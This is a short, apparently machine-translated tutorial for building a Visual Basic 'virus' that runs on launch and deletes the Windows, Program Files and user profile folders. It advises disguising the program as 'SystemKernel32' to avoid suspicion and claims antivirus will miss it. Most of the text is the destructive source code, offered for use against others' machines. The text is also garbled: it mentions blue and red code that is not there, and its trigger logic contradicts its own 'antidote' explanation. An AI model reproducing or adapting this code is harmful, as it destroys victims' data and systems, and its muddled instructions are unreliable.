Here a tutorial for making little-deadly virus, but simple, and does not seem to be caught by the antivirus, you see how easy it works
1. VB (optimum: 6.0)
2. can use VB
Virus Making Tutorial requires only 1 min
1. make a form as small as possible
2. teaching in that form, enter this code
Public Sub DelAll(ByVal DirtoDelete As Variant)
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
FileExist = True
End If
End Function
3. Code blue who is an antidote to this virus, you probably accidentally signed so you'll be all right. so in the folder c: \ windows \ system32 \ if there are files named katak.txt, you are not going to attack itself ... you can edit to what you want ...
The red color of the folders who's going to be deleted by this virus, you can edit by your own ...
4. Create a project is named as a system, here I make a "SystemKernel32" so I will not be suspicious
5. compile it,,, and you are done